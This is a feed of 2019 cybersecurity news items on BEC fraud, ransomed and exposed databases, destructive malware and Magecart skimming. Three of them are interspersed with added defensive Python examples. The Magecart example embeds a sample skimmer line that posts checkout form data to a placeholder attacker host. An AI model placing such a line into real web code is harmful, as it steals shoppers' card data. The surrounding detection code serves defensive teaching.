Info Security

BEC Scammers Cost US Universities Over $872K

Mon, 08/05/2019 - 10:45

A BEC scammer has pleaded guilty to his part in an operation in which he and co-conspirators tricked two US universities into sending over $872,000 to their accounts.

In July 2018, the University of California San Diego (UCSD) received an email spoofed to appear to come from a Dell account, asking the institution to redirect its payments to the firm to a new bank account in Minnesota.

The bank account belonged to Amil Hassan Raage, who pleaded guilty to fraudulently receiving nearly $750,000 in 28 payments from the university between August 8 and September 12, 2018.

Raage apparently withdrew the money each time it was wired and transferred it to another account.

His unnamed co-conspirators played a major part in the operation, by creating the spoofed Dell email account from a base in Kenya.

They went through the same modus operandi to defraud a second US university, this time based in Pennsylvania.

According to the Department of Justice (DoJ), the group again used the fake Dell email to trick university officials into wiring funds to a different account.

In total, the university sent six payments totaling over $123,000.

After the Wells Fargo bank in Minnesota froze Raage’s account, he fled the country in September to Kenya, only to be tracked down by local law enforcement working with the FBI’s legal attaché in the country.

He was finally arrested in May 2019 and extradited a couple of weeks after.

“Modern criminals like Raage have ditched the ski mask and getaway vehicle and opted for a computer as their weapon of choice. As this defendant has learned, we are matching wits with new-age thieves and successfully tracking them down and putting an end to their high-tech deception,” said US attorney Robert Brewer.

BEC attacks cost businesses nearly $1.3bn last year, nearly half of the total cybercrime losses recorded by the FBI.

Categories: Cyber Risk News

Over Two Million Online Records Held to Ransom

Mon, 08/05/2019 - 09:35

A Mexican bookstore that exposed millions of records through a publicly accessible database has had the data stolen and ransomed by hackers.

Libreria Porrua left the 2.1 million customer records online in a MongoDB database reachable at two separate IP addresses, according to Comparitech, which collaborated with security researcher Bob Diachenko on the case.

The company, a bookseller and publisher with a history going back over 100 years, failed to respond to Diachenko when he notified it of the discovery on July 15. Three days later, the data had been wiped and replaced with a ransom note demanding around $500 in Bitcoin.

Public access to the database was disabled the next day, but it’s unclear whether the company paid the ransom or not.

Two sets of records were included in the trove: the first featuring names, addresses, phone numbers, emails, shipping numbers, invoice details and hashed payment card info. The second featured full names, dates of birth, phone numbers, discount card activation codes and more.

“I have previously reported that the lack of authentication allows the installation of malware or ransomware on the MongoDB servers. The public configuration makes it possible for cyber-criminals to manage the whole system with full administrative privileges,” Diachenko is quoted as saying.

“Once the malware is in place, criminals could remotely access the server resources and even launch a code execution to steal or completely destroy any saved data the server contains.”

Customers of the bookstore are potentially at risk from follow-on phishing attacks if the hackers decide to monetize their efforts further.

MongoDB has been a favorite target for hackers looking to capture and hold customer data to ransom over the past few years.

Several such cases emerged in 2017, but one of the most serious related to a 2018 incident when a database containing the voter records of over 19.5 million Californians was held to ransom.

Categories: Cyber Risk News

Destructive Malware Goes Mainstream as Attacks Soar 200%

Mon, 08/05/2019 - 08:48

The volume of destructive malware attacks has risen by 200% year-on-year in the first half of 2019, according to new data from IBM X-Force.

Once the preserve of sophisticated nation state actors, it appears as if financially motivated cyber-criminals are now getting in on the act, which is bad news for a range of organizations, according to the Incident Response and Intelligence Services (IRIS) report.

Analyzing incident response data from the first six months of the year, the report claimed that such attacks now cost multi-nationals on average $239m — 61-times more than the industry average of around $3.9m.

They also take a long time to respond to and remediate — on average 512 hours — with many victim organizations using multiple companies to assist them, further increasing the time taken.

Most concerning for organizations caught out by a destructive attack: on average a single blitz destroys 12,000 machines per company.

Destructive attacks have most commonly been associated with sophisticated malware such as Stuxnet, DarkSeoul and Shamoon, as nation states go after geopolitical rivals, explained IBM X-Force in a blog post introducing the research.

“Since 2018, however, we have observed the profile of these attacks expanding beyond nation-states as cyber-criminals increasingly incorporate destructive components, such as wiper malware, into their attacks,” it added.

“This is especially true for cyber-criminals who use ransomware, including strains such as LockerGoga and MegaCortex. Financially motivated attackers may be adopting these destructive elements to add pressure to their victims to pay the ransom, or to lash out at victims if they feel wronged.”

Half of these attacks — centered around the US, Middle East and Europe — targeted manufacturing during the reporting period, with oil and gas and education sectors also hit hard.

Hackers are often inside networks for weeks or months before launching their attacks, IBM said.

“Destructive malware adversaries often gain initial entry into systems through phishing emails, password guessing, third-party connections and watering hole attacks,” it added.

“We observe them taking care to covertly preserve access to privileged accounts or critical devices for the destructive phase of their attack, using them alongside legitimate remote command services within the targeted environment, such as PowerShell scripts, to move laterally through the victim’s network.”

Defense-in-depth is the answer, with MFA, well-tested incident response plans, network monitoring, threat intelligence and regular offline back-ups essential, IBM recommended.
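The dwell-time and lateral-movement pattern IBM describes above (a privileged account reused across many machines over remote command channels) is visible in the Windows logon records most organizations already collect. The following is an added example, not code from the article or from IBM X-Force: it runs a simple fan-out detection over a constructed sample of logon events in the shape of the fields a SIEM extracts from Windows Security event 4624 (time, target host, account, logon type, source IP). The account names, hosts, addresses and thresholds are all invented for the illustration; the logon-type meanings (3 network, 10 RDP, 2 interactive) are the standard Windows ones.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, not real telemetry: one logon per line as
# "time target_host account logon_type source_ip", the fields a SIEM pulls
# from Windows Security event 4624. Type 3 is a network logon (SMB, WMI,
# PowerShell remoting), 10 is RDP, 2 is an interactive console logon.
SAMPLE_LOGONS = """
2019-06-02T23:05:00 FS01    svc_backup 3  10.0.5.23
2019-06-03T02:10:05 FS01    svc_backup 3  10.0.5.23
2019-06-03T02:12:41 HR-PC07 svc_backup 3  10.0.5.23
2019-06-03T02:14:09 SQL02   svc_backup 3  10.0.5.23
2019-06-03T02:17:30 DC01    svc_backup 3  10.0.5.23
2019-06-03T02:19:55 WEB03   svc_backup 10 10.0.5.23
2019-06-03T09:00:12 FS01    jsmith     3  10.0.7.88
2019-06-03T09:01:00 LT-0412 jsmith     2  10.0.7.88
"""


def parse_logons(text):
    """Parse the constructed format into (time, host, account, logon_type, src)
    tuples sorted by time, so the sliding window below sees events in order."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, account, ltype, src = line.split()
        events.append((datetime.fromisoformat(ts), host, account, int(ltype), src))
    events.sort()
    return events


def fan_out_accounts(events, window=timedelta(minutes=15), min_hosts=4,
                     remote_types=(3, 10)):
    """Return {account: hosts} for every account that logs on remotely to at
    least `min_hosts` distinct machines inside any interval of length `window`.
    Interactive logons are ignored: a person sitting at a console is not
    lateral movement, a service account hopping between servers at 2 a.m. is."""
    recent = defaultdict(deque)   # account -> deque of (time, host), oldest first
    hits = defaultdict(set)
    for ts, host, account, ltype, _src in events:
        if ltype not in remote_types:
            continue
        q = recent[account]
        q.append((ts, host))
        while ts - q[0][0] > window:   # evict logons that fell out of the window
            q.popleft()
        hosts = {h for _, h in q}
        if len(hosts) >= min_hosts:
            hits[account] |= hosts     # accumulate every host seen while over threshold
    return dict(hits)


if __name__ == "__main__":
    for account, hosts in fan_out_accounts(parse_logons(SAMPLE_LOGONS)).items():
        print(f"{account}: remote logons to {len(hosts)} hosts within 15 min: {sorted(hosts)}")
```

On the sample, svc_backup trips the rule (five hosts in under ten minutes) while jsmith does not; the 23:05 logon the previous evening is outside the window and is discarded, which is the point of the eviction loop. In production the threshold and window are tuned per account class (backup and patching accounts legitimately touch many hosts, but on a schedule and from known sources), and the same logic applies to PowerShell remoting (event 4104 script blocks or WinRM logs) once those are centralized, which is why IBM's advice to keep logs and monitoring off the machines an attacker can wipe matters.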

Categories: Cyber Risk News

BSides Manchester Hits Back at Sponsor Influence Claims

Fri, 08/02/2019 - 15:55

The organizers of BSides Manchester have hit back at accusations of corporate influence by a sponsor. 

In a series of tweets, degenerateDaE highlighted the number of talks being given by employees of NCC Group, and noted that the company is also the platinum sponsor. “Out of the six organizers listed I was able to confirm at least 5/6 worked at NCC when BSides Manchester was created in 2014,” they said, pointing out that at least three still work for NCC Group.

“Figured I'd tweet about this because the link between NCC and BSides Manchester was not one that I was personally aware of, nor have I seen anyone else talk about this. It would be great to get some transparency on this from the BSides Manchester team.”

Responding, BSides Manchester organizing committee member Matt Summers posted a statement calling the accusation “incredibly hurtful and makes us as organizers question why we do this.”

He clarified that “BSides Manchester is directed by three directors (board members) and listed as a Community Interest Company (CIC) which means that it is a not-for-profit and regulated as such.”

He went on to say that there are other directors who are not board members but who have helped organize the conference – some of whom are or have been directly employed by NCC Group. “However a few people who have remained in the shadows and who were not outed by this individual have never been employed by NCC Group. The directors and board members of the CIC have never hidden their employment from the community.”

He said the intention behind BSides Manchester was to put on a regional event, as he “missed the camaraderie of BSides London,” and that he pitched the idea of a BSides Manchester to a senior person at NCC Group. “Why? Because I needed some seed money to get the event off the ground.”

He said: “Since 2014 NCC Group consistently sponsored as a platinum sponsor with other companies coming and going as platinum sponsors, but we have never turned a company down when it came to the level of sponsorship they wanted.

“Over the last two years we have had three platinum sponsors. Over the years this has meant that we have had to rejig the layout of the venue to ensure that everyone gets what it is in the contract and every sponsor got a fair and honest slice of the pie.”

Regarding the accusations of conflict of interest and insinuations that NCC Group had gained an unfair advantage over other sponsors and speakers, Summers said he had always been forthright with people that he wears two hats, one for his employer and one for BSides, “and anyone who knows me will know that I let my actions speak for me.”

He said: “This accusation is unfounded quite frankly insulting. Unfortunately, I can’t prove in any way that there is no conflict of interest. As board members and directors we insulated ourselves from the team that NCC Group put together to sponsor the event, I can’t prove this but I can say that we had a big enough job putting an event together without steering NCC Groups efforts at the event.

“There are also additional people who helped us put the event on that were not employed by NCC Group but I won’t call them out and drag them into this. NCC Group does have robust procedures about additional employment and ensuring that there are no conflicts of interest with any additional employment and I would hope that this would be enough for all parties.”

He also clarified that NCC Group is “probably the biggest employer of security people in Manchester,” and he praised them for being “incredibly supportive of those wishing to speak publicly.”

Security researcher Javvad Malik, who was one of the original organizing team of BSides London in 2011, along with Summers, praised him for being “one of the hardest workers in the room.”

Malik said: “It pains me to see accusations thrown at him, when I know he's a man of integrity and honesty. He invited me down to the first few BSides Manchesters to compere track one. I was incredibly honored. But again, I saw first-hand how much of himself he puts into these events. BSidesMCR was no exception, and it was run really well.

“So the question is, does NCC have an undue influence over BSidesMCR? And if you knew Matt at all, that's a shameful question to ask. I would never believe it, and I've seen pretty close how he runs cons.”

Malik made the point that if anyone feels like there are too many NCC Group employees running the conference, “put yourself forward and offer to help run the con yourself. It'll open your eyes to a lot of things.” This was echoed by Summers, who said: “The last thing I want to say is that every year we have asked for people to join us as organizers. In fact it’s on our website that we want people to help us.

“If people want transparency, then they can join us as organizers to see for real.”

Categories: Cyber Risk News

Initiative Launched to Protect Automotive Supply Chain

Fri, 08/02/2019 - 15:01

A new initiative has been announced by the Automotive Industry Action Group (AIAG) to help automotive suppliers compare their current capabilities to industry best practice.

Developed in partnership with NQC, the Cyber Safe Bundle includes a one-time virtual audit, along with either a basic or advanced enterprise risk assessment. Together, these resources allow suppliers to evaluate their overall cybersecurity efforts and identify the most critical areas for improvement.

The audit is a remote threat analysis that searches a supplier-provided URL or domain name for known vulnerabilities using a database of more than 53,000 common configuration issues, updated in real time with the latest threats. It then identifies system weaknesses without damaging the resource being checked and provides an automated corrective action plan with practical steps the supplier can take to improve its cybersecurity.

Tanya Bolden, AIAG’s director of supply chain products and services, said: “Cyber-attacks have become so prevalent that larger companies are now spending thousands and sometimes millions of dollars to protect their systems. AIAG feels strongly about the importance of making resources developed by OEMs available to smaller companies in the automotive supply chain – companies that may not have the budget or human resources available to proactively protect themselves from cyber-attack.

“The perception is that only larger companies are targeted for cyber-attack, but the fact is that small and medium-sized companies are particularly vulnerable. A supply chain is only as strong as its weakest partner, which is why cyber-attackers go after companies that may be easier targets.” 

Charles Morrison, NQC managing director, added: “We are very pleased to bring our expertise to this collaboration with AIAG, and we are confident this suite of tools will provide much needed protection to suppliers across the industry.”

Categories: Cyber Risk News

DCMS Committee Request Further Facebook Details on Cambridge Analytica Investigation

Fri, 08/02/2019 - 09:00

Chair of the Digital, Culture, Media and Sport Committee Damian Collins MP has written to Facebook VP for global affairs and communications Sir Nick Clegg about discrepancies relating to the Cambridge Analytica investigation.

Collins asked the former Deputy Prime Minister and Liberal Democrat leader, who joined Facebook in October 2018, about who at Facebook knew what, and when, about Cambridge Analytica’s activities on the platform with the “this is your digital life” app, which led to the misuse of 87 million people’s data.

Collins noted that “senior executives from Facebook, including its Chief Technology Officer Mike Schroepfer and Lord Richard Allan, consistently asserted in evidence over the course of 2018 to the Committee that Facebook first learned that Global Science Research (GSR) and Cambridge Analytica had compromised Facebook user data from a Guardian article published in December 2015,” whereas the SEC’s complaint states that Facebook employees already knew about Cambridge Analytica prior to December 2015.

“We therefore request a response on whether the SEC complaint is accurate that employees did raise concerns about Cambridge Analytica before December 2015 and how these discrepancies in evidence have occurred,” Collins’ letter stated.

The letter also notes that, despite the red flags raised by Facebook employees about Cambridge Analytica from as early as September 2015, these incidents were not reported to senior management. In a letter to the Committee dated May 14 2018, Rebecca Stimson, Facebook’s UK head of public policy, confirmed that “Mr. Zuckerberg did not become aware of allegations that Cambridge Analytica may not have deleted data about Facebook users obtained through Dr Kogan’s app until March of 2018, when these issues were raised in the media.”

Collins also sought guarantees on the deletion of user data held by Cambridge Analytica, as the SEC complaint notes that several Facebook employees were also aware of data misuse throughout 2016 and beyond. On February 8 2018, Simon Milner, policy director at Facebook, denied to the Committee that Cambridge Analytica held a “large chunk of Facebook user data.”

Collins said that the Committee was requesting information on the instances in which employees raised concerns about Cambridge Analytica, why no action was taken until 2018, and why the Committee was not informed about these concerns in the sessions with Milner and Schroepfer.

Last week, the Securities and Exchange Commission fined Facebook $100m “for making misleading disclosures regarding the risk of misuse of Facebook user data.” The SEC’s complaint alleged that Facebook discovered the misuse of its users’ information in 2015, but did not correct its existing disclosure for more than two years.

Stephanie Avakian, co-director of the SEC’s Enforcement Division said: “As alleged in our complaint, Facebook presented the risk of misuse of user data as hypothetical when they knew user data had in fact been misused. Public companies must have procedures in place to make accurate disclosures about material business risks.”

Categories: Cyber Risk News

70% of Orgs Will Use Security-as-a-Service by 2021

Fri, 08/02/2019 - 08:15

More than 70% of organizations will be using Security-as-a-Service by 2021, according to new research from Thycotic.

The privileged access management provider surveyed IT managers and technology decision makers at the KuppingerCole European Identity & Cloud conference in Munich in May, compiling its findings in the Security as a Service on the Rise report.

Two out of three respondents said their organization is already adopting Security-as-a-Service, or will be in the next 12 months, with 70% planning to do so by 2021. Those polled cited reduced costs, faster IT services delivery and greater flexibility as reasons for opting for Security-as-a-Service solutions.

“Organizations typically use Security-as-a-Service solutions to limit or eliminate the need for on-premise hardware, software or specialized skilled resources,” said Joseph Carson, chief security scientist at Thycotic.

Respondents also indicated they are turning to cloud-based security services to help keep up with rapidly escalating threats, costs and a lack of staff resources with cybersecurity expertise.

“In another interesting result, the survey showed the security functions most frequently moved to Cloud-as-a-Service were led by Privileged Account Management and Identity Access Management,” added Carson.

Categories: Cyber Risk News

Vendor Blocks 65,000 Magecart Data Theft Attempts in July

Thu, 08/01/2019 - 15:30

Magecart groups appear to be having a busy summer so far, with one security vendor blocking 65,000 attempts to steal card details from online stores in July alone.

Malwarebytes revealed the findings in a new blog post: it shows that US shoppers account for the largest share of those targeted, nearly 54% in total. Canadians came in second with nearly 16%, and then there is a long tail of countries including Germany (7%), the Netherlands (6%), France and the UK (5% each) and Australia (3%).

The firm claimed it is becoming increasingly difficult to differentiate digital skimming groups by code types alone, as copycats reuse existing tools.

There’s also a growing trend among these hackers to use some kind of obfuscation to stay hidden.

“This is an effort to thwart detection attempts and also serves to hide certain pieces of information, such as the gates (criminal controlled server) that are used to collect the stolen data,” said Jérôme Segura, director of threat intelligence at Malwarebytes.

Visiting only larger online sites is no guarantee that consumers will be safe from digital skimmers, especially given the attacks on big-name brands like BA, Newegg and others. BA was famously issued a record £183m proposed fine last month by the ICO for breaking the GDPR.

“Combating skimmers ought to start server-side with administrators remediating the threat and implementing a proper patching, hardening and mitigation regimen. However, based on our experience, a great majority of site owners are either oblivious or fail to prevent reinfections,” argued Segura.

“A more effective approach consists of filing abuse reports with CERTs and working with partners to take a more global approach by tackling the criminal infrastructure. However, even that is no guarantee, especially when threat actors rely on bulletproof services.”

One noteworthy bulletproof hosting service was revealed last month to be operating out of a war zone in eastern Ukraine.

Categories: Cyber Risk News

(ISC)2 Granted Approved Professional Organization Status by HMRC

Thu, 08/01/2019 - 14:55

(ISC)2, the nonprofit membership association of certified cybersecurity professionals, announced that it has been granted Approved Professional Organizations and Learned Societies status by HM Revenue & Customs (HMRC).

This status recognizes (ISC)2 among a select number of essential professional societies and bodies that share or advance professional knowledge, maintain or improve professional conduct and competence or protect members from claims made against them while doing their job. It also allows UK members of (ISC)2 to claim tax relief on their annual maintenance fee.

The learned societies and professional associations on the list are predominantly nonprofit organizations, such as industry bodies, charter organizations and livery companies, as well as independent member associations that exist to raise standards and help their members. The inclusion of (ISC)2 on the list is recognition of its efforts to inspire a safe and secure cyber-world and advance cybersecurity knowledge and skills through training and certification.

Speaking to Infosecurity, Dr. Casey Marks, chief product officer and vice president, (ISC)2, said that the HMRC approval is validation that the mission of (ISC)2 to inspire a safe and secure cyber-world is of vital importance to the UK government.

“It means that our members are now recognized by the UK’s tax authority as serving an essential professional function and as such, they can claim tax relief on their annual fees,” he added. “It will also help some of our members recoup their membership fees, as some UK employers only reimburse professional memberships if they are part of the HMRC list. The HMRC approval essentially lightens the out-of-pocket costs that these skilled professionals pay and lets them focus on defending their organizations from attacks.

“We hope that the HMRC approval incentivizes more interested professionals to pursue certification with us and build careers focused on bolstering cybersecurity defenses in both the private and public sectors.”

Categories: Cyber Risk News

Bug Bounties Paid for Deep Testing and Less for Traditional Flaws

Thu, 08/01/2019 - 13:10

The number of vulnerabilities being reported and bug bounty payouts per vulnerability have increased this year. 

According to Bugcrowd’s State of Crowdsourced Security in 2019 report, there has been a 92% increase in the total number of vulnerabilities reported in the last year, while the average payout per vulnerability increased this year by 83%.

Bugcrowd said that more industries are adopting crowdsourced security programs, and crowdsourced pen testing and vulnerability disclosure “are growing at breakneck pace and the number of companies running programs for multiple years has resulted in a marked increase in the number of public programs.”

David Baker, CSO and VP of operations at Bugcrowd, told Infosecurity that “this is both a good thing and proof there are always more bugs to be found.”

“More bugs are not the result of a lack of testing or poor SDLC [software development life cycle], but the shift to cloud, push to mobile apps and adoption of IoT,” he said. “Ultimately, the fact that the crowd is finding more and more P1s means that these critical bugs are being identified and resolved sooner. Finding bugs is a good thing; promoting better defense through a better offense is a great SDLC strategy.”

Bugcrowd also said that the average payout for critical vulnerabilities reached $2,669.92, a 27% increase over the last year. However, it claims that “researchers are no longer going after things like XSS, CSRF, and SSI as those are fairly easy to find by many scanners out there today” and are now doing deeper testing, with the five most reported vulnerability classes over the past year being:

  1. Broken access control
  2. Sensitive data exposure
  3. Server security misconfiguration
  4. Broken authentication and session management
  5. Cross-site scripting

Speaking to Infosecurity, Luta Security CEO Katie Moussouris said that “broken access control” is a very broad category “that absolutely can still be quantified as low-hanging fruit” and if an organization places no authentication at all on an asset or API, that's a simple mistake, not at all indicative of deeper or more sophisticated bugs. “Same goes for information disclosure findings that lead to data exposure, the second one in that list.” 

Moussouris said that even organizations with a lot of general process maturity and a strong secure development life cycle see basic XSS bugs crop up, especially in third-party developed websites.

“The fact of the matter is that while bug bounty hunting can help out," she said, "organizations cannot use them or any other external testing mechanism as a checkbox to excuse complacency in prevention of common classes of bugs, like authentication bugs.”

Moussouris went on to say that some organizations view bug bounties “as a way to look busy and responsive in security, when it's actually masking underlying security negligence,” and that the classes of bugs most often found in bug bounties are still on the lower end of sophistication.

“Most organizations should be actively trying to prevent and detect those themselves, not outsource their detection to the luck of the bug bounty draw.”

Categories: Cyber Risk News

PCI Council & Retail ISAC Issue Magecart Warning

Thu, 08/01/2019 - 10:32

The PCI Security Standards Council and Retail and Hospitality ISAC have joined forces to highlight the growing threat of online skimming attacks, such as Magecart.

“These attacks infect e-commerce websites with malicious code, known as sniffers or JavaScript sniffers and are very difficult to detect,” an alert stated. “Once a website is infected, payment card information is ‘skimmed’ during a transaction without the merchant or consumer being aware that the information has been compromised.”

As the attacks either compromise e-commerce websites directly or tamper with the third-party software libraries that merchants rely upon, “these service providers may not be aware of the risk they create for their customers if they are not focused on security and the potential threats targeting them.”

Troy Leach, chief technology officer, PCI Security Standards Council, said: “We have heard from many of our stakeholders in the payment community that these types of attacks are a growing trend for many businesses, large and small. We felt, as a leader in payment security, now was the time to issue a bulletin with our friends and colleagues from the retail and hospitality sector who battle these threats daily.”  

The alert warned that any e-commerce implementation that does not have effective security controls in place is potentially vulnerable. “There are ways to prevent these difficult-to-detect attacks however,” said Leach. “A defense-in-depth approach with ongoing commitment to security, especially by third-party partners, will help guard against becoming a victim of this threat.” 

Carlos Kizzee, vice-president, intelligence at the Retail and Hospitality ISAC, added that these attack techniques are of increasing significance to the retail and hospitality industry, and it is important that businesses grow their awareness of the nature of these attacks and of the security controls necessary to detect and defeat them.

Kizzee said: “The bulletin we are jointly issuing today should be a call to action to those in the business community to enhance their awareness of and vigilance against these techniques. No one should presume that they couldn’t or won’t be used to target their enterprise.

“We must endeavor to ensure that focused attention, commitment and peer collaboration in e-commerce cybersecurity efforts within the retail and hospitality industry outpaces the growth and evolution of threats such as these.”
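Both Magecart stories on this page (the Malwarebytes figures above and this PCI/RH-ISAC bulletin) come down to one mechanism: a script the checkout page loads is modified so that, in the browser, it copies card fields to a criminal "gate". Two controls address that directly. Subresource Integrity pins the hash of each script in the page so the browser refuses a changed copy, and an out-of-band job re-hashes what the site is actually serving and compares it with the hashes approved at deploy time, which catches the more common case where the attacker edits a first-party file on the server. The code below is an added example, not code from Malwarebytes, the PCI SSC, the ISAC or any merchant: the script bodies, file names and the `gate.example.invalid` host are constructed for the illustration (`.invalid` is a reserved, non-resolving TLD), and the SRI hash format is the standard `sha384-<base64 digest>`.

```python
import base64
import hashlib


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value ("sha384-<base64 digest>") for a script body."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """The <script> tag to ship: with integrity set, the browser rejects a copy
    of the file whose hash no longer matches, instead of executing it."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def verify_served_scripts(served: dict, pinned: dict) -> dict:
    """Out-of-band monitor: compare the script bodies the site serves right now
    against the hashes approved at deploy time. Returns {script: problem} for
    anything worth an alert; an empty dict means the checkout is as deployed."""
    problems = {}
    for name, expected in pinned.items():
        body = served.get(name)
        if body is None:
            problems[name] = "pinned script missing from the site"
            continue
        algo = expected.split("-", 1)[0]          # reuse whatever algorithm was pinned
        if sri_hash(body, algo) != expected:
            problems[name] = "content changed since it was pinned"
    for name in served:
        if name not in pinned:
            problems[name] = "script served that was never reviewed or pinned"
    return problems


# Constructed inputs, not real site content. The skimmed copy keeps the original
# behaviour and appends one line that posts the checkout form to the gate, which
# is why a skimmer is invisible to shoppers and to functional tests alike.
CLEAN_CHECKOUT_JS = b"document.forms[0].addEventListener('submit', e => track(e));\n"
SKIMMED_CHECKOUT_JS = CLEAN_CHECKOUT_JS + (
    b"fetch('https://gate.example.invalid/c', {method: 'POST', "
    b"body: new FormData(document.forms[0])});\n"
)
LIBRARY_JS = b"/* third-party library body, unchanged */\n"

PINNED_AT_DEPLOY = {
    "checkout.js": sri_hash(CLEAN_CHECKOUT_JS),
    "vendor.min.js": sri_hash(LIBRARY_JS),
}
SERVED_TODAY = {
    "checkout.js": SKIMMED_CHECKOUT_JS,           # tampered on the server
    "vendor.min.js": LIBRARY_JS,                  # still matches
    "analytics.js": b"/* appeared without review */\n",  # never pinned
}

if __name__ == "__main__":
    print(script_tag("/static/checkout.js", CLEAN_CHECKOUT_JS))
    for name, problem in verify_served_scripts(SERVED_TODAY, PINNED_AT_DEPLOY).items():
        print(f"ALERT {name}: {problem}")
```

The browser-side check only protects files referenced with an `integrity` attribute; an attacker who can edit the page HTML itself can drop or update the attribute, which is why the server-side comparison against deploy-time hashes is the control that actually detects the first-party tampering Segura describes. A Content-Security-Policy whose `connect-src` and `form-action` list only the merchant's own and payment provider's origins blocks the exfiltration request even when a skimmer does run, and is worth deploying alongside the hashing.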

Categories: Cyber Risk News

Honda Exposes 40GB of Company Data

Thu, 08/01/2019 - 10:27

Global automobile manufacturer Honda leaked a database of company data that exposed 134 million documents, roughly 40GB of information.

In a blog post, researcher xxdesmus revealed how he discovered an Elasticsearch database without any authentication.

“The data contained within this database was related to the internal network and computers of Honda Motor Company. The information available in the database appeared to be something like an inventory of all Honda internal machines. This included information such as machine hostname, MAC address, internal IP, operating system version, which patches had been applied, and the status of Honda’s endpoint security software. I would like to thank the security team at Honda Motor Company for their very prompt action to secure the database shortly after being notified.”

A statement from Honda to the researcher read: “The security issue you identified could have potentially allowed outside parties to access some of Honda’s cloud-based data that consisted of information related to our employees and their computers. We investigated the system’s access logs and found no signs of data download by any third parties. At this moment, there is no evidence that data was leaked, excluding the screenshots taken by you. We will take appropriate actions in accordance with relevant laws and regulations, and will continue to work on proactive security measures to prevent similar incidents in the future.”

Igor Baikalov, chief scientist at Securonix, said, “This is a hacker’s dream, a treasure trove of the most sought-after information. Whoever has it can own Honda’s network. While it is unclear if this data has already been accessed by someone maliciously, it does highlight a concerning flaw in the security practices of Honda.”

If an attacker has already gained access they could use the data to carry out further attacks and gain deeper access to Honda’s networks causing substantial damage, he added.

“This incident should be a lesson to organizations that any documents, servers or databases should be secured and at the very least password protected. What may seem like meaningless logs to an organization could actually provide a wealth of opportunity to a skilled and knowledgeable attacker.”
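This Honda exposure and the Libreria Porrua ransom case earlier on this page share the same two-part root cause: a datastore bound to every network interface with authentication left off, which is the combination Diachenko warns gives any connecting client full administrative control. The following is an added example, not code from the article, Comparitech, Diachenko, xxdesmus, Honda or Securonix: a small audit of the two settings that matter in mongod.conf and elasticsearch.yml, fed with constructed configuration trees of the shape a YAML loader would produce. The defaults it assumes are those of MongoDB 3.6+ (bindIp 127.0.0.1, authorization off) and Elasticsearch 7.x (network.host `_local_`, xpack.security.enabled false; 8.x enables security by default); adjust them for other versions.

```python
import ipaddress


def reachable_beyond_loopback(addr: str) -> bool:
    """True when a bind address lets other hosts connect (anything but loopback).
    Understands plain IPs plus Elasticsearch's _local_/_site_/_global_ aliases."""
    addr = addr.strip()
    if addr in ("localhost", "_local_"):
        return False
    if addr in ("_site_", "_global_"):
        return True
    try:
        return not ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return True          # hostname or interface name: assume it is reachable


def audit_mongod(cfg: dict) -> list:
    """cfg mirrors the mongod.conf YAML tree (net.bindIp, net.bindIpAll,
    security.authorization). Defaults assumed: bindIp 127.0.0.1, auth off."""
    findings = []
    net = cfg.get("net", {})
    binds = str(net.get("bindIp", "127.0.0.1")).split(",")
    if net.get("bindIpAll") or any(reachable_beyond_loopback(b) for b in binds):
        findings.append("net.bindIp: remote hosts can connect")
    if cfg.get("security", {}).get("authorization") != "enabled":
        findings.append("security.authorization: off, any client is a full admin")
    return findings


def audit_elasticsearch(cfg: dict) -> list:
    """cfg mirrors elasticsearch.yml flat keys (network.host,
    xpack.security.enabled). Defaults assumed: _local_, security off (7.x)."""
    findings = []
    hosts = cfg.get("network.host", "_local_")
    hosts = hosts if isinstance(hosts, list) else [hosts]
    if any(reachable_beyond_loopback(str(h)) for h in hosts):
        findings.append("network.host: remote hosts can connect")
    if not cfg.get("xpack.security.enabled", False):
        findings.append("xpack.security.enabled: off, REST API needs no credentials")
    return findings


def rating(findings: list) -> str:
    """Reachable AND unauthenticated is what turned these incidents into breaches;
    either alone is a warning to review against the network boundary."""
    return {0: "ok", 1: "warning"}.get(len(findings), "critical")


# Constructed configs: the exposed shape beside a corrected one for each product.
MONGO_EXPOSED = {"net": {"bindIp": "0.0.0.0"}}
MONGO_LAN_WITH_AUTH = {"net": {"bindIp": "127.0.0.1,10.20.0.5"},
                       "security": {"authorization": "enabled"}}
MONGO_LOCAL_WITH_AUTH = {"net": {"bindIp": "127.0.0.1"},
                         "security": {"authorization": "enabled"}}
ES_EXPOSED = {"network.host": "0.0.0.0"}
ES_HARDENED = {"network.host": ["_local_"], "xpack.security.enabled": True}

if __name__ == "__main__":
    for label, audit, cfg in [("mongod exposed", audit_mongod, MONGO_EXPOSED),
                              ("mongod LAN+auth", audit_mongod, MONGO_LAN_WITH_AUTH),
                              ("elasticsearch exposed", audit_elasticsearch, ES_EXPOSED),
                              ("elasticsearch hardened", audit_elasticsearch, ES_HARDENED)]:
        found = audit(cfg)
        print(f"{label}: {rating(found)} {found}")
```

The LAN-bound MongoDB with authorization enabled still rates a warning on purpose: a private address is reachable from anywhere that can route to it, including a compromised workstation or a misconfigured cloud security group, so the question of who can reach the port has to be answered at the network boundary, and authentication must be on regardless. Run the checks from configuration management so a new node cannot ship with the exposed shape, and confirm from outside the perimeter that the port is actually closed rather than trusting the file alone.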

Categories: Cyber Risk News

Resource Headaches Top Security Pros’ Challenges

Thu, 08/01/2019 - 09:05

Dwindling resources, experience and skills are the biggest challenges facing the cybersecurity profession today, according to new research from the Chartered Institute of Information Security.

Nearly half (45%) of those polled for the institute’s annual survey, The Security Profession in 2018/19, pointed to lack of resources as the biggest issue they face, followed by lack of experience (37%) and skills shortages (31%).

The latter have been an issue for years, with global shortages estimated at nearly three million, including 142,000 in EMEA.

The professionals the industry does have risk being swamped by the black hats: just 11% of respondents said security budgets were rising in line with, or ahead of, threat levels, while the majority (52%) said budgets were rising, but not quickly enough.

When asked to choose between people, process and technology, the vast majority of professionals polled for this report claimed that people (75%) were the biggest challenge to cybersecurity, rather than process (12%) and technology (13%).

“Clearly, this could be a shortage of skilled security architects, the fact that developers seldom create secure code, the user awareness problem where passwords and phishing emails are concerned; probably it is a combination of people-related issues,” the report explained.

On the plus side, the dearth of qualified professionals led a majority of respondents to claim this is a good time to join the industry: 86% said the industry will grow over the next three years and 13% said it will “boom.”

